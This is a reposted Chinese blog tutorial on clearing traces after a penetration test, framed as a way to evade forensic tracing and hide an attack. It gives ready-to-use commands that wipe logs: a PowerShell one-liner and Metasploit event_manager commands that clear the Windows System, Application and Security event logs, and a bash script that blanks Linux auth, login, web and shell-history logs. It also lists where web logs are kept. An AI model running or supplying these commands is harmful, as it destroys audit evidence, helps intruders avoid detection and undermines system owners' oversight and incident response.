痕迹清理,是我们“肾透”测试后期最重要的环节。是躲避反追踪和隐藏攻击的重要环境。通过本文一起来学习吧。
清理Windows系统痕迹
在windows系统中,主要的日志分为以下三类:系统日志(SysEvent)、应用程序日志(AppEvent)、安全日志(SecEvent)。我们可以通过win+r + eventvwr.msc 打开事件查看器。查看相应的事件信息。
系统日志清理
记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃及数据 默认位置:C:WindowsSystem32winevtLogsSystem.evtx
应用程序日志
主要记录程序运行方面的事件,默认位置:C:WindowsSystem32winevtLogsApplication.evtx
安全日志
记录系统安全审计事件,包含各种类型登录日志、对象访问日志、进程追踪、特权使用、账号管理、策略变更和系统事件。默认位置:C:WindowsSystem32winevtLogsSecurity.evtx
日志清理
PowerShell命令
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
msf清理
# 显示日志信息
run event_manager -i
# 清除指定日志
run event_manager -c System
# 清除所有日志
run event_manager -c
Linux系统日志清理
Linux 大多数日志文件就是文本,常见痕迹清理位置:/var/log。如下图,日志比较多。
但是最常用的日志有:
-
user.log用户信息日志 -
auth.log用户登录日志 -
btmp登录失败日志
为了方便,这里我们写了一个清理脚本。
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
echo > /var/log/dpkg.log
echo > /var/log/daemon.log
echo > /root/.bash_history
history -c
清除Web日志
web日志会记录用户对web页面的访问操作,web日志会记录访问时间、访问IP地址、访问资源,以及是否访问成功等信息。这里我们以apache2为例、默认文件位置为var/log/apache2,常用的宝塔的日志文件/www/log
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):渗透测试之痕迹清理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论